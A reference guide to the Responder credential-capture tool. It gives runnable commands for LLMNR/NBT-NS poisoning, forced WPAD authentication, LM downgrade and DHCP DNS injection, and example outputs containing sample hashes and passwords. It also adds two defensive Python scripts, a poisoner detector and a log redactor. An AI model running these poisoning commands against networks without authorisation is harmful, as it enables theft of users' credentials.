Responder

Responder tool guide: the tool's purpose, primary uses, core features, data sources, common commands and examples of command usage.


Responder is an open-source LLMNR, NBT-NS, and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers. It is one of the most powerful tools for capturing credentials in Windows Active Directory environments. Responder exploits the weaknesses in Windows name resolution protocols to intercept authentication attempts and capture password hashes.

Here are the primary uses of Responder:

  • LLMNR/NBT-NS Poisoning: Responder poisons Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) queries, causing Windows systems to send authentication credentials to the attacker's machine. This is one of the most effective methods for obtaining credentials in Windows networks.

  • Credential Harvesting: The tool captures NTLMv1, NTLMv2, and other authentication hashes when Windows systems attempt to authenticate to the rogue servers it creates. These hashes can be cracked offline or used in pass-the-hash attacks.

  • Man-in-the-Middle Attacks: Responder can perform various man-in-the-middle attacks against Windows authentication mechanisms, intercepting and relaying authentication attempts to capture credentials or gain unauthorized access.

  • Rogue Server Deployment: Responder deploys multiple rogue authentication servers (HTTP, SMB, MSSQL, FTP, LDAP) that mimic legitimate services, tricking clients into authenticating against them and revealing their credentials.

  • Active Directory Assessment: Security professionals use Responder during Active Directory penetration tests to identify weak authentication practices, misconfigured systems, and vulnerable network segments where credentials can be easily captured.

  • Network Reconnaissance: Beyond credential capture, Responder can gather valuable information about network structure, naming conventions, user accounts, and service locations within Windows environments.
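The poisoning described in the first bullet above has a simple defensive counterpart: ask the segment, over LLMNR, for a name that no host owns, and treat any answer as a poisoner, because a legitimate LLMNR responder only answers for names it actually holds. The script below is an added example written for this guide; it is not part of the Responder project. It follows the LLMNR wire format from RFC 4795 (DNS-style header, multicast group 224.0.0.252, UDP port 5355); the function names and the embedded sample response are my own constructions.

```python
import os
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # LLMNR IPv4 multicast group (RFC 4795)
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS-style length-prefixed labels."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("!B", len(raw)) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build an LLMNR A-record query; the header layout is the same as DNS."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def _skip_name(data: bytes, offset: int) -> int:
    """Return the offset just past a name, which may end in a 2-byte compression pointer."""
    while offset < len(data):
        length = data[offset]
        if length == 0:
            return offset + 1
        if length & 0xC0 == 0xC0:
            return offset + 2
        offset += 1 + length
    return offset


def parse_llmnr_response(data: bytes, txid: int) -> list:
    """Return the IPv4 addresses carried in A records of a response to transaction txid."""
    if len(data) < 12:
        return []
    rid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or (flags & 0x8000) == 0:  # wrong transaction, or not a response
        return []
    off = 12
    for _ in range(qdcount):  # skip the echoed question section
        off = _skip_name(data, off) + 4
    answers = []
    for _ in range(ancount):
        off = _skip_name(data, off)
        if off + 10 > len(data):
            break
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            answers.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return answers


def random_probe_name() -> str:
    """A name no legitimate host should own, so any answer for it is suspect."""
    return "probe-" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz", k=10))


def probe_for_poisoner(timeout: float = 2.0) -> list:
    """Send one LLMNR query for a random name; collect (source_ip, claimed_ips) for every answer."""
    txid = int.from_bytes(os.urandom(2), "big")
    query = build_llmnr_query(random_probe_name(), txid)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src_ip, _port) = sock.recvfrom(512)
            claimed = parse_llmnr_response(data, txid)
            if claimed:
                hits.append((src_ip, claimed))
    except socket.timeout:
        pass  # no answer within the window: nothing on the segment claimed the name
    finally:
        sock.close()
    return hits


# Constructed sample: an answer claiming the probe name resolves to 192.168.1.100.
SAMPLE_TXID = 0x1234
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", SAMPLE_TXID, 0x8000, 1, 1, 0, 0)
    + encode_name("probe-xyz") + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    + b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 30, 4)
    + socket.inet_aton("192.168.1.100")
)

if __name__ == "__main__":
    for src, ips in probe_for_poisoner():
        print(f"ALERT: {src} answered an LLMNR query for a nonexistent name with {ips}")
    print("offline parser check:", parse_llmnr_response(SAMPLE_RESPONSE, SAMPLE_TXID))
```

Run it from a host on the segment under review; the constructed SAMPLE_RESPONSE lets the parser be checked without any network. The probe cannot see analyze mode (-A), which answers nothing, and the same idea carries over to NBT-NS on UDP port 137.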

Core Features

  • LLMNR Poisoning
  • NBT-NS Poisoning
  • MDNS Poisoning
  • HTTP Authentication Server
  • SMB Authentication Server
  • MSSQL Authentication Server
  • FTP Authentication Server
  • LDAP Authentication Server
  • NTLMv1/v2 Hash Capture
  • Kerberos Hash Capture
  • WPAD Proxy Server
  • Analyze Mode
  • Fingerprinting
  • Session Management

Data sources

  • LLMNR Queries
  • NBT-NS Queries
  • MDNS Queries
  • WPAD Requests
  • Authentication Attempts
  • Network Traffic
  • Password Hashes
  • User Credentials
  • Service Requests

Common Responder Commands

1. Basic Execution

  • This command starts Responder with default settings on the specified network interface. It begins poisoning LLMNR and NBT-NS queries to capture credentials.
responder -I <interface>

2. Analyze Mode

  • This command runs Responder in analyze mode, monitoring network traffic without performing any poisoning. It is useful for reconnaissance and understanding network behavior before launching attacks.
responder -I <interface> -A

3. Enable WPAD Proxy

  • This command enables the Web Proxy Auto-Discovery (WPAD) rogue proxy server. It can capture HTTP authentication credentials from browsers and applications that use WPAD for proxy configuration.
responder -I <interface> -w

4. Force WPAD Authentication

  • This command forces WPAD authentication by serving a rogue PAC file that requires authentication. It is particularly effective for capturing credentials from web browsers.
responder -I <interface> -w -F

5. Disable SMB Server

  • This command disables the SMB authentication server while keeping other services active. It is useful when targeting specific protocols or avoiding detection.
responder -I <interface> --disable-smb

6. Disable HTTP Server

  • This command disables the HTTP authentication server, focusing poisoning efforts on other protocols such as SMB or FTP.
responder -I <interface> --disable-http

7. Enable Fingerprinting

  • This command enables detailed fingerprinting of connecting hosts, gathering information about operating systems, browser versions, and other client details.
responder -I <interface> -f

8. Verbose Output

  • This command enables verbose output mode, displaying detailed information about all poisoning attempts, authentication captures, and network activity.
responder -I <interface> -v

9. Specify Log Directory

  • This command sets a custom directory for storing captured credentials and log files. It helps keep the outputs of multiple assessments organized.
responder -I <interface> -o /path/to/logs

10. Listen on All Interfaces

  • This command makes Responder listen on all available network interfaces simultaneously, which is useful on systems with multiple network connections.
responder -I all

11. Disable NetBIOS

  • This command disables NBT-NS poisoning while keeping LLMNR poisoning active. It is useful for targeting specific name resolution protocols.
responder -I <interface> --disable-nbt

12. Enable DHCP Poisoning

  • This command enables DHCP poisoning to inject malicious DNS server addresses, redirecting name resolution queries to the attacker's system.
responder -I <interface> -d

13. Custom Challenge

  • This command sets a fixed NTLM challenge value instead of random challenges. It is useful for rainbow table attacks or specific testing scenarios.
responder -I <interface> --lm --challenge <challenge>

14. Force LM Downgrade

  • This command forces LM hash downgrade attacks, attempting to capture weaker LM hashes that are easier to crack than NTLMv2.
responder -I <interface> --lm

15. Run in Background

  • This command runs Responder as a background process, allowing it to continue capturing credentials while other tasks are performed.
responder -I <interface> &

16. Target Specific Domain

  • This command configures Responder to target a specific Windows domain, focusing poisoning efforts on domain-joined systems.
responder -I <interface> -r <domain>

17. Disable Multicast

  • This command disables multicast name resolution poisoning, focusing only on broadcast-based NBT-NS queries.
responder -I <interface> --disable-mdns

18. Help and Usage Information

  • This command displays the help menu and usage information for Responder, listing all available options and attack modes. Option names differ between Responder releases and forks, so confirm the flags used in this guide against the help output of the installed version before relying on them.
responder -h

Alternative usage:

responder --help

Output Examples of Responder Commands

Command | Example Usage | Function | Output Example
---|---|---|---
Basic Execution | responder -I eth0 | Starts poisoning on the eth0 interface. | [+] Listening for events...<br>[+] Poisoning LLMNR & NBT-NS
Analyze Mode | responder -I eth0 -A | Monitors without poisoning. | [+] Analyze mode enabled<br>[*] LLMNR request from 192.168.1.10
WPAD Enabled | responder -I eth0 -w | Enables the WPAD proxy server. | [+] WPAD Proxy Server started<br>[+] Listening on port 3128
Force WPAD Auth | responder -I eth0 -w -F | Forces WPAD authentication. | [+] WPAD forced authentication enabled
Disable SMB | responder -I eth0 --disable-smb | Disables the SMB server. | [+] SMB server disabled
Disable HTTP | responder -I eth0 --disable-http | Disables the HTTP server. | [+] HTTP server disabled
Fingerprinting | responder -I eth0 -f | Enables host fingerprinting. | [+] Fingerprinting enabled<br>[*] OS: Windows 10 Pro
Verbose Mode | responder -I eth0 -v | Shows detailed output. | [*] Verbose mode enabled<br>[*] Sent poisoned answer to 192.168.1.10
Custom Log Dir | responder -I eth0 -o /tmp/logs | Sets a custom log directory. | [+] Logs saved to /tmp/logs
NBT-NS Poisoned | responder -I eth0 | Captures an NBT-NS query. | [NBT-NS] Poisoned answer sent to 192.168.1.10<br>Requested name: FILESERVER
LLMNR Poisoned | responder -I eth0 | Captures an LLMNR query. | [LLMNR] Poisoned answer sent to 192.168.1.10<br>Requested name: SHAREPOINT
SMB Hash Captured | responder -I eth0 | Captures an SMB NTLMv2 hash. | [SMB] NTLMv2 Client: 192.168.1.10<br>User: DOMAIN\john<br>Hash: john::DOMAIN:1122334455667788:...
HTTP Hash Captured | responder -I eth0 | Captures an HTTP NTLM hash. | [HTTP] NTLMv2 Client: 192.168.1.10<br>User: admin<br>Hash: admin:::1122334455667788:...
LDAP Credentials | responder -I eth0 | Captures LDAP credentials. | [LDAP] Clear text credentials:<br>User: administrator<br>Password: P@ssw0rd123
FTP Hash Captured | responder -I eth0 | Captures FTP authentication. | [FTP] NTLMv2 Client: 192.168.1.10<br>User: ftpuser<br>Hash: ftpuser::DOMAIN:...
MSSQL Hash | responder -I eth0 | Captures MSSQL authentication. | [MSSQL] NTLMv2 Client: 192.168.1.10<br>User: sa<br>Hash: sa::DOMAIN:...
Kerberos TGT | responder -I eth0 | Captures a Kerberos ticket. | [KRB5] TGT captured from 192.168.1.10<br>User: john@DOMAIN.LOCAL
WPAD Request | responder -I eth0 -w | Captures a WPAD request. | [WPAD] Request from 192.168.1.10<br>User-Agent: Mozilla/5.0
Clear Text Creds | responder -I eth0 | Captures plaintext credentials. | [+] Clear text credentials captured:<br>Username: admin<br>Password: password123
Disable NBT-NS | responder -I eth0 --disable-nbt | Disables NBT-NS poisoning. | [+] NBT-NS poisoning disabled
LM Downgrade | responder -I eth0 --lm | Forces LM hash capture. | [+] LM downgrade attack enabled<br>[LM] Hash captured from 192.168.1.10
Custom Challenge | responder -I eth0 --challenge 1122334455667788 | Uses a custom NTLM challenge. | [+] Using custom challenge: 1122334455667788
DHCP Poisoning | responder -I eth0 -d | Enables DHCP poisoning. | [+] DHCP poisoning enabled<br>[DHCP] Injected DNS: 192.168.1.100
Session Info | responder -I eth0 | Shows session statistics. | [+] Captured 15 hashes<br>[+] 5 unique users compromised
Startup Banner | responder -I eth0 | Shows the Responder startup banner. | _____ _
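For reviewing what a run produced, the following Python parser is an added example written for this guide (it is not part of Responder). It turns lines in the formats shown in the table into structured events, masks captured hashes and passwords so a summary can be shared with the system owners, and counts poisoned clients and captured accounts per protocol, which is the "Session Info" view an assessor or SOC analyst wants when writing up findings. The sample output is constructed from the table's line formats, and the names Event, parse_output, redact and summarize are my own.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample run output, following the line formats shown in the table above.
SAMPLE_OUTPUT = """\
[+] Listening for events...
[LLMNR] Poisoned answer sent to 192.168.1.10
Requested name: SHAREPOINT
[NBT-NS] Poisoned answer sent to 192.168.1.10
Requested name: FILESERVER
[SMB] NTLMv2 Client: 192.168.1.10
User: DOMAIN\\john
Hash: john::DOMAIN:1122334455667788:...
[HTTP] NTLMv2 Client: 192.168.1.10
User: admin
Hash: admin:::1122334455667788:...
[SMB] NTLMv2 Client: 192.168.1.23
User: DOMAIN\\john
Hash: john::DOMAIN:8877665544332211:...
[LDAP] Clear text credentials:
User: administrator
Password: P@ssw0rd123
"""

POISON_RE = re.compile(r"^\[(?P<proto>LLMNR|NBT-NS|MDNS)\] Poisoned answer sent to (?P<ip>[\d.]+)$")
CAPTURE_RE = re.compile(
    r"^\[(?P<proto>[A-Z0-9-]+)\] (?P<kind>NTLMv[12]|Clear text credentials)\D*(?P<ip>[\d.]+)?$"
)
KV_RE = re.compile(r"^(?P<key>Requested name|User|Username|Hash|Password): (?P<value>.*)$")
SECRET_KEYS = {"Hash", "Password"}


@dataclass
class Event:
    protocol: str            # LLMNR, NBT-NS, SMB, HTTP, LDAP, ...
    kind: str                # "poison", "NTLMv2", "Clear text credentials", ...
    client: Optional[str]    # client IP when the header line carries one
    fields: dict = field(default_factory=dict)


def parse_output(text: str) -> list:
    """Group each header line with the 'Key: value' lines that follow it."""
    events, current = [], None
    for line in text.splitlines():
        m = POISON_RE.match(line)
        if m:
            current = Event(m["proto"], "poison", m["ip"])
            events.append(current)
            continue
        m = CAPTURE_RE.match(line)
        if m:
            current = Event(m["proto"], m["kind"], m["ip"])
            events.append(current)
            continue
        m = KV_RE.match(line)
        if m and current is not None:
            current.fields[m["key"]] = m["value"]
    return events


def redact(ev: Event) -> Event:
    """Copy of an event with hash and password values masked, so the report can be shared."""
    masked = {k: ("<redacted>" if k in SECRET_KEYS else v) for k, v in ev.fields.items()}
    return Event(ev.protocol, ev.kind, ev.client, masked)


def summarize(events: list) -> dict:
    """Per-client poisoning counts and per-protocol capture counts for a findings write-up."""
    poisoned_clients, captures_by_proto = Counter(), Counter()
    accounts = defaultdict(set)  # account -> client IPs it was captured from
    for ev in events:
        if ev.kind == "poison":
            poisoned_clients[ev.client] += 1
            continue
        captures_by_proto[ev.protocol] += 1
        user = ev.fields.get("User") or ev.fields.get("Username")
        if user:
            accounts[user].add(ev.client or "unknown")
    return {
        "poisoned_clients": dict(poisoned_clients),
        "captures_by_protocol": dict(captures_by_proto),
        "unique_accounts": sorted(accounts),
        "clients_per_account": {u: sorted(ips) for u, ips in accounts.items()},
    }


if __name__ == "__main__":
    evs = [redact(e) for e in parse_output(SAMPLE_OUTPUT)]
    for e in evs:
        print(e)
    print(summarize(evs))
```

The same account captured from two different client addresses (DOMAIN\john in the sample) is the kind of detail worth calling out in a report, since it points at a shared or service account in use on several machines.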